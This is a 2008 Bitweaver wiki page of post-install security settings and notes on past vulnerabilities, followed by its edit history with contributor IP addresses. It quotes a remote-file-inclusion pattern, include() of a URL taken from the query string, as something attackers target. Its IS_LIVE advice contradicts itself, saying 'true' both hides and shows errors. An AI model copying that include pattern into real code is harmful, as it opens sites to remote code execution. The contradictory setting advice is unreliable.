History of Security

Version 2

Security

Bitweaver security settings

Created by: laetzer, Last modification: 15 Jul 2008 (16:13 UTC) by laetzer

Bitweaver 2

Security settings

After you installed bitweaver, check the following settings:
  • In /kernel/config_inc.php the parameter IS_LIVE should be "true" (it's "true" by default). From then on, error messages are not exposed to visitors anymore. To see the errors yourself, either monitor your error logs directly from the server, or set IS_LIVE to "true" only while testing and developing (while having other protection in place).
  • Rename your /install/ directory. Rename it back only to install new packages.
  • In Admin > Users > Permissions, make sure that Anonymous is not allowed to attach files to content (not allowed by default)
  • If users are allowed to input HTML, enable HTMLPurifier, which strips malicious code.
  • If Anonymous can submit content, enable CAPTCHA (depends on your server's setup).

Security issues

wiki_url_import

The "suck_url Information Disclosure" security issue has been fixed in version 2.1. Before, it was exploitable when the admin turned on the feature wiki_url_import (off by default).

Hacking attempts

The script kiddie plague du jour is the idea to exploit code that does: include($varWithSomeUrlFromGetString); which would execute remotely written PHP. If such an attack is attemped, a bitweaver install might mail an error message to you, the admin, alerting something like "unknown column" or "unknown sort order" (note that normal users browsing your pages will never see any error message unless you set IS_LIVE to false in /kernel/config_inc.php). The error mail informs you that the attemptet hack failed (that it didn't do anything).

3rd party applications

PHP security settings

  • For security reasons, your server might run PHP with features like open_basedir or safe_mode switched ON. See Install under safe mode.

Bitweaver 1.3

Bitweaver versions 1.3 and before were released in 2004/2005 (see bitweaverRoadMap). These versions are not supported anymore, i.e., the code hasn't been updated since the release. There are a couple of serious security issues. Some stem from 3rd party code, like left-over code from older versions or the infamous Xmlrpc bug (if enabled). Many of the improvements introduced with bitweaver 2 addressed these issues specifically. In other words, don't install version 1.3 anymore. If you're running version 1.3 and are concerned about security, please upgrade bitweaver.
Page History
Date/CommentUserIPVersion
13 Feb 2010 (19:57 UTC)
added alias
laetzer85.178.0.1706
Current • Source
Benjamin Couhe80.4.75.275
View • Compare • Difference • Source
laetzer141.20.150.434
View • Compare • Difference • Source
laetzer141.20.150.433
View • Compare • Difference • Source
laetzer85.178.63.1672
View • Compare • Difference • Source
laetzer85.178.3.1651
View • Compare • Difference • Source